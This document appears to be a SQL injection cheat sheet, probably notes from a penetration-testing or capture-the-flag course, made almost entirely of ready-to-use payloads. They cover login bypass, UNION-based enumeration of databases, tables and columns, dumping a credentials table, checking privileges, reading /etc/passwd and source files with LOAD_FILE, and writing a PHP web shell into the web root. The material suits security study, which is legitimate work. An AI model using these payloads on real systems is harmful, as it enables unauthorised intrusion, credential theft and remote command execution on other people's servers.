SQL Injection
# Username
# If the db has an admin user
admin' or '1'='1
# Username
# If the db doesn't have an admin user
notAdmin' or '1'='1
# Password
123' or '1'='1
# If the query is in parentheses
# Like SELECT * FROM logins where (username='admin')
admin')--
# It will log in as superadmin since the id is 5
# It will work if the WHERE condition is in parentheses
# WHERE (username='' OR id = 5)-- -' AND id > 1)
' OR id = 5)-- -
') OR id = '5';-- -
# When using UNION, the right-side SELECT must return the same number of columns as the left-side SELECT
# So we added 4 numbers
select * from employees UNION select dept_no,dept_name,3,4,5,6 from departments;
cn' UNION select 1,2,3,4-- -
# This means that column 1 is not displayed on the page
# So we put the payload in column 2's spot
cn' UNION select 1,@@version,3,4-- -
' UNION select 1,user(),3,4-- -
# This serves the same purpose as the UNION select
# Once ordering by column 5 returns an error, it means the table only has 4 columns
' order by 2-- -
' order by 3-- -
' order by 4-- -
# This will display the database names
# SCHEMATA contains the information about all the databases
# Using information_schema > SCHEMATA
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
# This will determine which database the web app uses
cn' UNION select 1,database(),2,3-- -
# This will display the table names
# Using information_schema > TABLES
# Just specify the database name, like dev
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
# This will display the column names from table credentials
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
# This will display the data of columns
cn' UNION select 1, username, password, 4 from dev.credentials-- -
# This will display the current database user
cn' UNION SELECT 1, user(), 3, 4-- -
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
# This will display the super privilege of the current database user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
# If the database has a lot of users
# This will display the privilege of a specific user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
# Y means Yes
# Indicating super privilege
# Dump all of the privileges
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
# This will display all of the information about the privileges of the current db user
# Like UPDATE, SELECT, INSERT, DELETE, etc.
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
# Display the file /etc/passwd
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
# Display the file /var/www/html/search.php
# Then press Ctrl+U to view the source code of search.php
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
# If the value is empty, it means files can be read from anywhere on the system
# But if the value is NULL, nothing can be read from the system
# Files can be read only if the user has the FILE privilege
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
# This will create a file into db
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
# Writing a web shell into db
# /shell.php?0=id
# /shell.php?0=cat ../flag.txt
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
cn' union select "",'<?php system($_REQUEST[cmd]); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell.php'-- -